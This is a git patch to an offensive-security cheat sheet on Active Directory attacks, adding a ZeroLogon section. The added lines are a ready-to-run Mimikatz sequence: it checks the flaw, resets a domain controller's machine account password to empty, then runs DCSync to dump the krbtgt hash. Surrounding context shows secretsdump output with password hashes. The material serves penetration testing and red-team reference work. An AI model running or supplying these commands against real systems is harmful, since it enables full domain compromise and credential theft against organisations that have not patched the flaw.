From 14586e4d7a3f9f6c82447dd24880da0ea29afbc8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 16 Sep 2020 14:13:40 +0200
Subject: [PATCH] ZeroLogon via Mimikatz

---
 Methodology and Resources/Active Directory Attack.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 26d4276..c47a51b 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -292,6 +292,17 @@ $ secretsdump.py 'domain/DC01$@DC01.domain.local' -hashes aad3b435b51404eeaad3b4
 Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::  
 ```
 
+with Mimikatz : 2.2.0 20200916 ZeroLogon & DCSync
+
+```powershell
+privilege::debug
+# check for the CVE
+lsadump::zerologon /target:DC01.corp.local /account:DC01$
+# exploit the CVE and set the computer account's password to ""
+lsadump::zerologon /target:DC01.corp.local /account:DC01$ /exploit
+# dcsync to extract some hashes
+lsadump::dcsync /domain:CORP.LOCAL /dc:dc01.corp.local /user:krbtgt /authuser:DC01$ /authdomain:CORP /authpassword:"" /authntlm
+```
 
 ### Open Shares